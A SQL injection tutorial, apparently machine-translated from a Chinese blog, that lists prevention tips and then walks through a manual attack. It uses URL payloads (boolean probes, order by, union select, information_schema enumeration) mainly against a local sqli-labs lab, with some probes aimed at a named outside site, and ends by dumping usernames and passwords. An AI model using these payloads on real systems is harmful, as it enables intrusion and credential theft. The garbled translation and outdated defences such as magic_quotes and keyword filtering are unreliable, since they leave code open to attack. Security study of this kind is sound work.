We focus on the following aspects to look at this question:
1. What is sql injection?
2. Why sql injection?
3. How to sql injection?
1. What is sql injection?
The so-called SQL injection, is submitted by the SQL commands inserted into a Web form or enter a domain name or page request query string, and ultimately to deceive the server to execute malicious SQL commands, such as many video sites previously leaked password VIP members mostly is through WEB Form submit queries character storms out, these forms are particularly vulnerable to SQL injection attacks. When an application uses input to construct dynamic content sql statement to access the database when, sql injection attacks occur. If the code using stored procedures, which are stored as a string containing unfiltered processes user input to pass, sql injection will occur. SQL injection attacks by hackers can get a website database access, after which they can get all the data in the database sites, malicious hackers can function even tamper with data in the database will destroy the data in the database out by SQL injection. As a web developer you hated this kind of hacking, of course, it is necessary to understand SQL injection principle function of this approach and learn how to protect their website database through code
sql injection principle:
Below us about sql injection principle, in order to enable the reader to sql injection attacks have a perceptual awareness, the other attack, the principle is the same.
SQL injection allows an attacker to bypass authentication mechanism, complete control of the database on a remote server. SQL is short for Structured Query Language, which is the de facto standard for database access. Currently, most Web applications use SQL database to store application data. Almost all of the Web application in the background are using some SQL database. Like most languages, SQL database commands and syntax allows user data mixed together. If the developer is not careful, the user data is likely to be interpreted as a command, in this case, remote users not only to the Web application input data, but also to execute arbitrary commands on the database.
The main form of SQL injection attacks, there are two:
♦ one directly to a code inserted in series together and SQL command which is performed by the user so that the input variables. The author cited above example is the use of this method. Due to its directly tied to the SQL statement, it is also known a direct injection attack method.
♦ Second, an indirect attack, the malicious code injection will be stored in a table or as a character string data stored in the original book. It will be stored in the string connected to a dynamic SQL command, SQL to perform some malicious code. Work early termination of the injection process is a text string, and then append a new command. Such as direct injection attacks, for example. That is, when the user input variables, the first end of the current statement with a semicolon. Then insert a malicious SQL statement can be. Since the insertion commands may append another character string prior to execution, the attacker is often labeled with a comment "-" injected to terminate the string. When executed, the system will think Thereafter position statement notes, so the subsequent text will be ignored, not back compile and execute.
2. Why sql injection?
The reason ♦ SQL injection produced: program development process, specification writing sql statements and not pay attention to the special character of the filter, resulting in the client can submit a number of sql statement by the global variables POST and GET normally.
Prevent SQL injection:
1, open magic_quotes_gpc and magic_quotes_runtime settings in the configuration file
2, the implementation of sql statement when using addslashes be converted sql statement
3, Sql statement is written so as not to omit small quotes or single quotes
4, filter out some keywords sql statement: update, insert, delete, select, *
5, to improve skills naming database tables and fields, some important fields are named according to the characteristics of the program, taking not easily be guessed.
6, Php configuration file settings register_globals is off, turn off global variable registration
7, control error message, do not output an error message on the browser, the error message is written to the log file.
How Anti-SQL Injection?
1, filter out some common database operations Keywords: select, insert, update, delete, and, * etc.
Or by a system function: addslashes (content to be filtered) to filter
2, the configuration file PHP Register_globals = off; // set to a closed state to effect register globals off.
For example: the value of the received POST form using $ _POST [ 'user'], if the register_globals = on; $ user can directly use the value of the form received.
3, SQL statements written in small try not to omit quotation marks (tab above the key) and single quotes
4, to improve the skills database name, for some important fields are named according to the characteristics of the program, taking not easily be guessed
5, for the package to be commonly used method, to avoid direct SQL statements storm drain
6, open the PHP safe mode Safe_mode = on;
7, open magic_quotes_gpc to prevent SQL injection Magic_quotes_gpc = off; is off by default, query sql statement it will open automatically submitted by users to convert, put 'into \', which have a significant role in preventing sql injection.
Thus Open: magic_quotes_gpc = on;
8, control error message
Close the error message, the error message is written to the system log.
9, using mysqli or pdo pretreatment.
Sentence summary, see the programmer to change these norms norms out, that they must attack.
3. How to sql injection?
For a more intuitive so that we understand the principles sql injection, affix a schematic sql injection attack
● SQL injection threat manifestations may be embodied in the following points:
● bypass authentication, access permissions illegal
● guess all the information back-end database solution
● implantation may be by means of stored procedures database operations such as lifting weights
● typical means of SQL injection attacks
● determine whether the application exists Injection Vulnerability
● collect information, and determines the type of the database
● Depending on the type of injection parameters, the reconstruction of the original SQL statement
● guess the table name, field name
● obtain account information, web attacks or to prepare for the next attack
Second, the simple example of SQL injection
Several injection vulnerability determination method 1.SQL
①http://www.heetian.com/showtail.asp?id=40'
②http://www.heetian.com/showtail.asp?id=40 and 1=1
③http://www.heetian.com/showtail.asp?id=40 and 1=2
If after performing ①, suggesting an error page or prompt database error, it indicates the presence of injection vulnerability.
If, after ②, displayed correctly, but after performing ③, page error, then explain this page injection vulnerability exists.
Because the correct link: http:? //Www.heetian.com/showtail.asp id = 40 no problem, if executed if ①, suggesting an error page or prompt database error, then explained that the condition is not satisfied, indicating the query conditions not satisfied, there is a query, the next injection vulnerability exists, if executed ②, displayed correctly, but after performing ③, page error, then explain this page injection vulnerability exists.
2. Collect information, determines the type of the database
The database based on the type of information returned therefrom, may be more aware that some fields in the database as well as other useful information, providing upholstery for the next attack.
The type of injection parameters, the SQL statement reconstructed original
①ID = 40 such injection parameter is numeric, then the original SQL statement is roughly: Select * from table where field = 40
②name = movie is the character of these injection parameters, SQL statements, original roughly: Select * from table where field = 'movie'
③ When no search filtering parameters, such as keyword = keyword, SQL statements, substantially original: Select * from Table where field like '% keyword%'
4. guess the table name, field name (to add SQL statements directly to the URL)
①and exists(select*from 表名)
If the page has not changed, indicating that additional conditions are satisfied, it is to explain the table name guess is correct, on the contrary, that the table does not exist, then you continue to guess, know the correct
②and exists (select field from table)
Principle of the method as above
③ guess of the fields (with the above guess table names and field names than historic methods and solving trouble)
● guess the length of the field contents
(Select top 1 len (field names) from the table name)> 0 up to guess> n-is not established when the length of the field is obtained: n + 1.
● After obtaining the length, the specific content guess
(Select top 1 asc (mid (username, 1,1)) from table name)> 0 until> when m is not satisfied, you can guess the value of the ASCII code.
Of course, we guess guess show field there are other ways, the next pass I use other methods to demo it for you.
Foreword
This article is a basic manual SQl injection process was. Basically sqlilabs the above experiment, if you know all the knowledge of them, can be Tuoku through the following steps. This is the basis of the following steps Tuoku other means. If you want to be proficient in SQL injection, then this is the most basic step Tuoku must understand and master.
For convenience, we use the injection point numeric type before described as an example.
Overall steps:
1. The judgment is not the injection point
2. get the total number of fields
3. get bit display
4. Charles election Library
The search table is selected from
6. Charles selected column name
7. Tuoku (value we want is to get the column name)
1. The judgment is not the injection point
Several methods determine SQL injection vulnerabilities
①http://localhost/sqlilabs/Less-2/?id=1id'
②http://localhost/sqlilabs/Less-2/?id=1id and 1=1
③http://localhost/sqlilabs/Less-2/?id=1id and 1=2
If after performing ①, suggesting an error page or prompt database error, it indicates the presence of injection vulnerability.
If, after ②, displayed correctly, but after performing ③, page error, then explain this page injection vulnerability exists.
It shows http:? // localhost / sqlilabs / Less-2 / id = 1id
2. get the total number of fields
♦ backend SQL statements written roughly as follows:
select username,password,[....] from table where id=userinput
♦ By then we use order byto judge the statement selectnumber of the query fields.
Then the payload becomes:
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....
When order by 4the program went wrong in selectthe field a total of three.
3. get bit display
♦ will be displayed on the page from the selectfield selected, we next step is to determine which fields are displayed several fields.
Using the following payload (both available) is determined.
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
When used as above a payload, the page is shown below:
With the above display can know the page, the page is displayed in the 2nd and 3rd bits of information.
4. Charles election Library
♦ knowing the position after the display, then the next you can display information we want to know, such as version, user information database and so by displaying bits. Then we use the following payload can know the relevant information .
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
The page is displayed as:
So then we know the names of all the databases in the database in this way.
payload as follows:
http:? // localhost / sqlilabs / Less-2 / id = -1 union select 1,2, SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 # get the first library name http: // localhost / sqlilabs / Less- 2 /? id = -1 union select 1,2, SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 # obtain a second library name ...
The search table is selected from
♦ Because of database()return is the name of the current web database used by the program, then we will use database()to query all the table information. Of course, in the previous step. We already know the current databaseis security.
Then we constructed payload as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
So we get all the table names in the current database. The results page is returned:
So we know that there are four tables in the current database, respectively emails,referers,uagents,users.
6. Charles selected column name
♦ After knowing the name of the table, then we use information_schema.columnscan be obtained in the current table all fields according to the table name.
payload as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六进制)
The results page displays the following:
通过这个语句,我们就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password这些字段。但是我本地测试的测试的时候,这个存在一个问题,实际上在security数据库的users的表中,只有id,username,password这3个字段,其他的字段都是其他数据库的中users表的字段名。
通过上面的payload,我们也同样可以知道在emails,referers,uagents中的字段名称。
但是有的时候后台的代码可能仅用了使用where子句,那么这个时候就无法通过information_schema.coumns来得到列名了,这个时候只能够根据你自己多年的黑客经验来进行猜解了。猜解的方法也是比较的简单,使用exists子句就可以进行猜解了。假设在我们已经知道了表名的情况下(当然猜解表名也使用通过exists子句来完成)。
猜解的语句如下:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
主要的语句就是exists(select 需要猜解的列名 from users)这种句式。如果在users表中不存在uname列名,则页面不会显示内容或者是直接出现sql的错误语句。
如下如所示:
下面这个就是猜解到了users表中存在的字段。
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
猜测在users表中存在username列,上面的语句程序可以正常第返回结果,那么寿命在users表中确实存在username列名。
7.脱裤(就是得到我们想得到列名的值)
在知道了当前数据库所有的表名和字段名之后,接下来我们就可以dump数据库中所有的信息了。比如我们下载当前users表中所有的数据。
可以使用如下的payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
You can be obtained for all the users in the table usernameand passwordthe data, and in this way it is possible to obtain the data in other tables.
Summary: This is the principle sql injection, but you need to know:
1.mysql system functions
2. Understand the union under
3.order by used to sort the result set
4.mysql four important database database library: information_schema proformation_schema mysql test
The three important Datasheet: table_name table_schema table_type
6. understand the schema, schemata, schema_name, table_schema meaning is very important! Very important! Very important! (Say that three times ~)
I will write about in these down.
Lai Source: https://www.cnblogs.com/insane-Mr-Li/p/9138633.html